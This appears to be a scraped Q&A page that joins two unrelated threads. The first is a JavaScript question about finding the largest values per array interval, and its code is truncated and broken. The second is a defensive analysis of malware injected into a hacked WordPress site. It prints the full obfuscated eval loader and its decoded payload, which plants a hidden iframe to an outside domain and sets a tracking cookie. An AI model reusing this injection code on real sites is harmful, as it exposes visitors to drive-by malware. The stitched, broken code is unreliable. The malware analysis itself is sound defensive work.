I am trying to find the five largest numbers at set intervals, while also Removing those values from the array. I need to grab the top candidates in their respective range. That range can change and the number that I need to query can also change. Is there an efficient and preferably elegant solution to this? By elegance, I mean an algorithmic (preferably hashed) approach that removes inefficient sorting or actions that do not contribute to performance on sparse and large arrays.
var arr = [101, 88, 267, 175, 154, 39, 74, 217, 31, 105, 235, 31, 14, 49, 226, 195, 134, 207, 222, 281,
262, 112, 133, 115, 0, 53, 128, 103, 88, 145, 238, 13, 204, 199, 100, 247, 292, 157, 141, 286,
72, 160, 85, 61, 57, 54, 263, 50, 125, 179, 243, 281, 39, 76, 151, 79, 1, 238, 200, 249, 35, 82,
204, 174, 293, 216, 84, 209, 170, 236, 3, 247, 25, 162, 25, 57, 49, 215, 8, 167, 180, 268,
204, 257, 134, 151, 191, 81, 77, 106, 85, 128, 52, 136, 46, 185, 229, 116, 145, 253, 258, 222,
269, 225, 101, 175, 265, 77, 32, 8, 72, 54, 111, 264, 292, 161, 91, 215, 139, 245, 73, 127, 297,
73, 258, 183, 232, 55, 199, 175, 31, 24, 21, 155, 231, 95, 40, 223, 222, 86, 115, 210, 134, 229,
211, 54, 294, 153, 52, 165, 168, 125,186, 185, 289, 188, 248, 61, 136, 15, 19, 92, 200, 80, 208,
195, 241, 85, 288, 279, 119, 247, 208, 11, 80, 111, 29, 292, 222, 289, 70, 11, 209, 25, 267, 233,
16, 289, 154, 141, 174, 30, 156, 40, 266, 139, 116, 241, 1, 101, 109, 61, 220, 265, 45, 178, 166,
102, 181, 193, 202, 133, 200, 266, 114, 222, 231, 89, 190, 29, 20, 64, 233, 261,213, 40, 161, 167,
100, 121, 288, 268, 50, 264, 78, 105, 21, 33, 79, 114, 5, 134, 56, 259, 124, 44, 134, 133, 74, 176,
65, 68, 34, 56, 2, 287, 63, 167, 299, 59, 290, 241, 104, 75, 76, 116, 225, 297, 208, 136, 265, 290,
170, 267, 10, 176, 141, 217, 195, 4, 173, 32, 150, 271, 238, 171, 195, 16, 282, 77, 62, 39, 44, 248,
270, 222, 295, 122, 190, 230];
function maxAtIntervals (intervalLength, select, xs) {
const comparator = (a, b, _) => a - b;
const temp = [];
for (var i = 0; i < xs.length; i += intervalLength) {
const interval = xs.slice(i, i + intervalLength);
return temp;
console.log(maxAtIntervals(20, 5, arr));
.as-console-wrapper { max-height: 100% !important; top: 0; }
I have read #le_m's comment however finding the k largest / smallest items or the kth largest / smallest item is a complicated task in O(n). It's best implemented in sorting and taking the necessary ones from the beginning of the array.
Accordingly you may do as follows;
function segmentAndTakeMax(ar,sl,mc) { // array , segment length, max count
var tempar = Array.from({length: sl});
return Array.from({length: Math.ceil(ar.length/sl)})
.map((_,i) => tempar.map((_,j) => arr[i*sl+j])
.sort((a,b) => b-a)
var arr = Array.from(new Array(203), _ => ~~(Math.random()*100));
.as-console-wrapper { max-height: 100% !important; top: 0; }
Ok as per OP's performance concerns on V8 i have repharsed the code to use .reduce() which is much faster than .map() in V8. Here is the modified code.
function segmentAndTakeMax(arr, n, m) {
var li = arr.length-1; // last index
return arr.reduce((r,e,i,a) => i%n ? (r[r.length-1].push(e), // if i%n != 0 then do these -> push e to last sub array
i == li && (r[r.length-1] = r[r.length-1].sort((a,b) => b-a).slice(0,m)), // short circuit for if i == last index then sort and slice the last sub array
r) // return r
: (i && (r[r.length-1] = r[r.length-1].sort((a,b) => b-a).slice(0,m)), // if i%n == 0 then do these -> short circuit for if i != 0 then sort and slice the last sub array
r.push([e]), // push [e] (a new sub array) to r
r), []); // return r
var arr = Array.from(new Array(203), _ => ~~(Math.random()*100));
.as-console-wrapper { max-height: 100% !important; top: 0; }
My friends word press site was attacked and a bunch of php files injected with some eval statements, which i've inflated and decoded, but it has lead me to the below javascript.
Anyone any ideas how to deobfuscate this so we can read what it says?
ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{d=document}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122,112,98,116,116,112,107,32,76,95,113,104,45,112,94,110,99,109,106,40,40,44,113,111,82,114,111,105,109,101,37,51,53,39,43,115,116,96,112,116,113,103,107,103,39,51,38,59,124,11,7,105,101,38,107,97,117,103,100,97,115,109,111,46,98,109,108,107,104,99,66,110,96,96,105,101,99,39,120,13,9,7,115,97,113,30,112,116,109,107,58,114,114,38,38,59,12,8,6,118,96,112,29,117,96,30,58,32,109,95,115,105,102,95,113,111,113,44,114,115,100,112,62,103,100,108,113,59,12,8,6,118,96,112,29,117,113,106,29,61,31,98,108,99,116,107,98,110,115,44,105,111,98,95,113,105,110,108,43,104,113,99,99,59,12,8,6,105,101,38,114,114,107,44,102,110,99,99,117,79,101,38,36,97,99,107,102,110,38,39,58,61,44,47,29,38,37,30,114,97,45,103,107,100,100,118,76,102,39,37,84,105,109,98,108,119,114,37,38,33,60,43,46,32,37,36,29,40,116,95,43,105,109,98,98,120,78,100,37,39,76,81,70,69,38,39,30,61,44,47,121,124,116,95,43,105,109,98,98,120,78,100,37,39,78,110,98,114,96,37,38,33,60,43,46,41,40,121,10,10,8,7,97,111,98,115,106,101,109,114,43,119,113,103,113,101,39,37,57,115,115,119,105,101,61,44,112,39,42,113,113,110,108,41,36,32,122,30,109,111,114,103,113,105,110,108,55,97,97,113,108,108,116,114,98,59,31,106,98,102,115,56,42,39,42,101,111,97,39,52,45,48,43,47,45,48,47,39,40,39,111,118,56,32,115,109,109,58,44,37,40,103,113,95,37,54,47,46,41,49,47,46,45,41,42,37,109,120,58,30,122,60,46,113,113,121,107,99,59,32,59,98,102,118,31,97,105,97,114,113,58,34,114,37,40,115,115,108,106,43,38,32,59,60,104,100,111,97,108,99,29,115,113,97,58,34,103,114,113,112,57,45,44,112,116,106,105,100,110,117,107,108,96,119,112,46,104,108,99,111,46,95,97,47,101,99,98,100,45,110,101,112,33,30,116,105,99,114,101,61,33,37,40,103,113,95,37,51,47,46,41,54,47,46,38,43,38,32,29,104,100,103,100,104,115,59,31,39,42,101,111,97,39,49,45,48,43,52,45,48,40,41,36,34,61,58,44,105,101,112,94,109,100,60,57,47,99,103,115,62,38,39,56,13,9,7,122,13,9,7,115,97,113,30,98,120,111,59,107,101,118,30,65,97,115,99,37,41,58,99,117,112,45,113,98,116,67,95,113,101,39,99,117,112,45,101,98,116,67,95,113,101,39,39,40,55,40,57,10,10,8,103,99,40,99,109,96,117,108,99,107,116,45,97,108,111,106,103,98,46,104,108,97,101,119,77,99,40,38,93,92,117,115,107,99,114,60,37,38,61,60,43,46,41,122,98,108,99,116,107,98,110,115,44,96,111,110,105,102,101,60,37,92,95,116,114,106,102,113,59,36,43,113,113,37,41,42,37,56,32,100,118,109,105,113,99,112,61,38,41,98,120,111,44,113,111,70,75,81,83,115,112,102,110,102,38,38,43,38,57,29,112,96,114,101,61,46,37,56,125,12,8,122);}w=f;s=[];for(i=0;-i+800!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;try{document.body++}catch(gdsgd){xz(s)}
The hidden code is this:
function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;}
function rs(){return Math.random().toString(36).substring(5);}
var stnm=rs();
var ua = navigator.userAgent;
var url = document.location.href;
if(url.indexOf('admin')==-1 && ua.indexOf('Windows')!=-1 && (ua.indexOf('MSIE')!=-1||ua.indexOf('Opera')!=-1)){
document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://xxxxxxxxxxxx.info/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
var exp=new Date();exp.setDate(exp.getDate()+7);
if(document.cookie.indexOf('__utmfr=')==-1){document.cookie='__utmfr='+rs()+'; expires='+exp.toGMTString()+'; path=/';}
It's stored in the f array as simple ascii, but every four characters are incremented by 0, 1, 2, and 3 repeatedly in a simple attempt to obfuscate the code.
Looks like this adds a bit of code to every webpage to display a malicious url in an i-frame.
First, feed it through http://jsbeautifier.org/.
You now can easily deduce that v becomes the string "eval", and e is the eval function. Also, you can run the loop that builds the string from the array items to see what is does:
function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;}
function rs(){return Math.random().toString(36).substring(5);}
var stnm=rs();
var ua = navigator.userAgent;
var url = document.location.href;
if(url.indexOf('admin')==-1 && ua.indexOf('Windows')!=-1 && (ua.indexOf('MSIE')!=-1||ua.indexOf('Opera')!=-1)){
document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://pulldownlays.info/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
var exp=new Date();exp.setDate(exp.getDate()+7);
if(document.cookie.indexOf('__utmfr=')==-1){document.cookie='__utmfr='+rs()+'; expires='+exp.toGMTString()+'; path=/';}
Now it is quite obvious: It sets a random identifier cookie, and for every IE/Opera user on Windows who does not browse an "admin" url, it creates an iframe which is positioned off-screen. The iframe likely contains some drive-by-download of malware.
I just pasted this into http://jsbeautifier.org/... Good luck!
ww = window;
v = "v" + "al";
if (ww.document) try {
document.body = 12;
} catch (gdsgsdg) {
asd = 0;
try {
d = document
} catch (agdsg) {
asd = 1;
if (!asd) {
w = {
a: ww
v = "e".concat(v);
e = w[v];
if (1) {
f = new Array(102, 116, 108, 96, 116, 104, 109, 107, 32, 102, 112, 94, 40, 96, 42, 95, 41, 122, 112, 98, 116, 116, 112, 107, 32, 76, 95, 113, 104, 45, 100, 105, 111, 110, 112, 37, 77, 96, 114, 101, 46, 113, 95, 107, 100, 110, 107, 37, 41, 41, 38, 95, 45, 96, 41, 46, 41, 40, 41, 94, 59, 124, 11, 7, 102, 116, 108, 96, 116, 104, 109, 107, 32, 113, 113, 37, 41, 122, 112, 98, 116, 116, 112, 107, 32, 76, 95, 113, 104, 45, 112, 94, 110, 99, 109, 106, 40, 40, 44, 113, 111, 82, 114, 111, 105, 109, 101, 37, 51, 53, 39, 43, 115, 116, 96, 112, 116, 113, 103, 107, 103, 39, 51, 38, 59, 124, 11, 7, 105, 101, 38, 107, 97, 117, 103, 100, 97, 115, 109, 111, 46, 98, 109, 108, 107, 104, 99, 66, 110, 96, 96, 105, 101, 99, 39, 120, 13, 9, 7, 115, 97, 113, 30, 112, 116, 109, 107, 58, 114, 114, 38, 38, 59, 12, 8, 6, 118, 96, 112, 29, 117, 96, 30, 58, 32, 109, 95, 115, 105, 102, 95, 113, 111, 113, 44, 114, 115, 100, 112, 62, 103, 100, 108, 113, 59, 12, 8, 6, 118, 96, 112, 29, 117, 113, 106, 29, 61, 31, 98, 108, 99, 116, 107, 98, 110, 115, 44, 105, 111, 98, 95, 113, 105, 110, 108, 43, 104, 113, 99, 99, 59, 12, 8, 6, 105, 101, 38, 114, 114, 107, 44, 102, 110, 99, 99, 117, 79, 101, 38, 36, 97, 99, 107, 102, 110, 38, 39, 58, 61, 44, 47, 29, 38, 37, 30, 114, 97, 45, 103, 107, 100, 100, 118, 76, 102, 39, 37, 84, 105, 109, 98, 108, 119, 114, 37, 38, 33, 60, 43, 46, 32, 37, 36, 29, 40, 116, 95, 43, 105, 109, 98, 98, 120, 78, 100, 37, 39, 76, 81, 70, 69, 38, 39, 30, 61, 44, 47, 121, 124, 116, 95, 43, 105, 109, 98, 98, 120, 78, 100, 37, 39, 78, 110, 98, 114, 96, 37, 38, 33, 60, 43, 46, 41, 40, 121, 10, 10, 8, 7, 97, 111, 98, 115, 106, 101, 109, 114, 43, 119, 113, 103, 113, 101, 39, 37, 57, 115, 115, 119, 105, 101, 61, 44, 112, 39, 42, 113, 113, 110, 108, 41, 36, 32, 122, 30, 109, 111, 114, 103, 113, 105, 110, 108, 55, 97, 97, 113, 108, 108, 116, 114, 98, 59, 31, 106, 98, 102, 115, 56, 42, 39, 42, 101, 111, 97, 39, 52, 45, 48, 43, 47, 45, 48, 47, 39, 40, 39, 111, 118, 56, 32, 115, 109, 109, 58, 44, 37, 40, 103, 113, 95, 37, 54, 47, 46, 41, 49, 47, 46, 45, 41, 42, 37, 109, 120, 58, 30, 122, 60, 46, 113, 113, 121, 107, 99, 59, 32, 59, 98, 102, 118, 31, 97, 105, 97, 114, 113, 58, 34, 114, 37, 40, 115, 115, 108, 106, 43, 38, 32, 59, 60, 104, 100, 111, 97, 108, 99, 29, 115, 113, 97, 58, 34, 103, 114, 113, 112, 57, 45, 44, 112, 116, 106, 105, 100, 110, 117, 107, 108, 96, 119, 112, 46, 104, 108, 99, 111, 46, 95, 97, 47, 101, 99, 98, 100, 45, 110, 101, 112, 33, 30, 116, 105, 99, 114, 101, 61, 33, 37, 40, 103, 113, 95, 37, 51, 47, 46, 41, 54, 47, 46, 38, 43, 38, 32, 29, 104, 100, 103, 100, 104, 115, 59, 31, 39, 42, 101, 111, 97, 39, 49, 45, 48, 43, 52, 45, 48, 40, 41, 36, 34, 61, 58, 44, 105, 101, 112, 94, 109, 100, 60, 57, 47, 99, 103, 115, 62, 38, 39, 56, 13, 9, 7, 122, 13, 9, 7, 115, 97, 113, 30, 98, 120, 111, 59, 107, 101, 118, 30, 65, 97, 115, 99, 37, 41, 58, 99, 117, 112, 45, 113, 98, 116, 67, 95, 113, 101, 39, 99, 117, 112, 45, 101, 98, 116, 67, 95, 113, 101, 39, 39, 40, 55, 40, 57, 10, 10, 8, 103, 99, 40, 99, 109, 96, 117, 108, 99, 107, 116, 45, 97, 108, 111, 106, 103, 98, 46, 104, 108, 97, 101, 119, 77, 99, 40, 38, 93, 92, 117, 115, 107, 99, 114, 60, 37, 38, 61, 60, 43, 46, 41, 122, 98, 108, 99, 116, 107, 98, 110, 115, 44, 96, 111, 110, 105, 102, 101, 60, 37, 92, 95, 116, 114, 106, 102, 113, 59, 36, 43, 113, 113, 37, 41, 42, 37, 56, 32, 100, 118, 109, 105, 113, 99, 112, 61, 38, 41, 98, 120, 111, 44, 113, 111, 70, 75, 81, 83, 115, 112, 102, 110, 102, 38, 38, 43, 38, 57, 29, 112, 96, 114, 101, 61, 46, 37, 56, 125, 12, 8, 122);
w = f;
s = [];
for (i = 0; - i + 800 != 0; i += 1) {
j = i;
if ((031 == 0x19)) if (e) s = s + String.fromCharCode((1 * w[j] + e("j%4")));
xz = e;
try {
} catch (gdsgd) {